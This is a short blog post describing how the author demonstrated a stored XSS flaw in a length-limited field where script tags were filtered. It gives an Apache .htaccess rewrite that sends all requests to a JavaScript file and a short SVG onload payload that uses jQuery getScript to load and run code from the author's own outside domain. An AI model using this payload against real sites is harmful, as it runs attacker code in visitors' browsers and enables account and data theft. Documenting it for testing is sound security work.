Tuesday, January 5, 2016

xss-script injection if size matters...



Wanted to demonstrate a stored XSS vulnerability, with less space in the vulnerable field.
(In this case <script> tags was filtered so I had to use JQUERY)

-1-
Registered a .cf domain (4 characters domains are free) at http://www.freenom.com/ 

-2-
Set up an Apache and pointed whw3.cf to it.

-3-
Configure Apache to redirect / to my JavaScript file
.htaccess rewrite:

Options +FollowSymLinks
RewriteEngine on
RewriteCond %{REQUEST_URI} !^/a.js
RewriteRule ^(.*)$ http://%{HTTP_HOST}/a.js [R=301,L]

-4-
Injected the following
<svg/onload=$.getScript('http:/whw3.cf')></svg>